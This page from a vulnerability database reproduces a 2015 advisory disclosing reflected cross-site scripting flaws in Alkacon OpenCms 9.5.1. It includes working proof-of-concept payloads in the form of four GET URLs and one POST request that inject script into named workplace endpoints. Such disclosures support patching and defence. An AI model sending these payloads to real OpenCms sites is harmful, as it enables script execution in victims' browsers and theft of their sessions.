Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Alkacon OpenCms 9.5.1 Cross Site Scripting

🗓️ 13 Mar 2015 00:00:00Reported by Rehan AhmedType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 39 Views

Alkacon OpenCms 9.5.1 Cross Site Scripting vulnerabilit

Code
`Product: OpenCms  
Vendor: Alkacon Software  
Vulnerable Version(s): 9.5.1 and probably prior  
Tested Version: 9.5.1  
Vendor Notification: Mar 05, 2015 (https://github.com/alkacon/opencms-core/issues/304)  
Vendor Patch: Not Yet (No Specific Time-line)  
Public Disclosure: Mar 12, 2015  
Vulnerability Type: Cross-Site Scripting [CWE-79]  
CVE Reference:   
Risk Level: Medium  
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)  
Solution Status: Not Yet (https://github.com/alkacon/opencms-core/)  
Discovered and Credits: Rehan Ahmed ([email protected])  
  
_______________________________________________________________________________________________________________________  
Overview  
_______________________________________________________________________________________________________________________  
  
Alkacon OpenCms 9.5.1 or prior versions are prone to a multiple cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.  
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.  
This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.  
_______________________________________________________________________________________________________________________  
Vendor's Description of Application  
_______________________________________________________________________________________________________________________  
  
OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.  
The fully browser based user interface features configurable editors for structured content with well defined fields. Alternatively, content can be created using an integrated WYSIWYG editor similar to well known office applications. A sophisticated template engine enforces a site-wide corporate layout and W3C standard compliance for all content.  
OpenCms is based on Java and XML technology. It can be deployed in an open source environment (e.g. Linux, Apache, Tomcat, MySQL) as well as on commercial components (e.g. Windows NT, IIS, BEA Weblogic, Oracle).  
As true open source software, OpenCms is free of licensing costs.  
  
http://www.opencms.org/en/index.html  
_______________________________________________________________________________________________________________________  
Vulnerability Details & Exploit  
_______________________________________________________________________________________________________________________  
  
Method: GET  
  
/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink="+onmouseover="javascript:confirm(0);">Click HERE<!--  
/opencms/system/workplace/locales/en/help/index.html?buildframe=true&workplaceresource="+onmouseover=confirm(0)//  
/opencms/system/workplace/views/admin/admin-main.jsp?root=explorer&menu=no&path=%2Fpublishqueue';</script><script>confirm(0)</script>  
/opencms/system/workplace/views/explorer/explorer_files.jsp?mode=explorerview";</script><script>confirm(0)</script>  
  
Method: POST  
  
POST /opencms/system/modules/org.opencms.workplace.help/elements/search.jsp?__locale=en HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
Cookie: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
Accept-Language: en-US  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Referer: http://127.0.0.1:8080/opencms/system/modules/org.opencms.workplace.help/jsptemplates/help_head.jsp?__locale=en&homelink=null&workplaceresource=&buildframe=true  
Host: 127.0.0.1:8080  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0  
Content-Length: 104  
  
action=search&query=<iframe src=javascript:confirm(0);&index=German+online+help&searchPage=1&query2=1234  
  
_______________________________________________________________________________________________________________________   
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Mar 2015 00:00Current
7.4High risk
Vulners AI Score7.4
opencmsalkacon softwarecross-site scriptingvulnerabilitycve-79javaxmlbrowser-basedcontent managementexploitrisk medium
39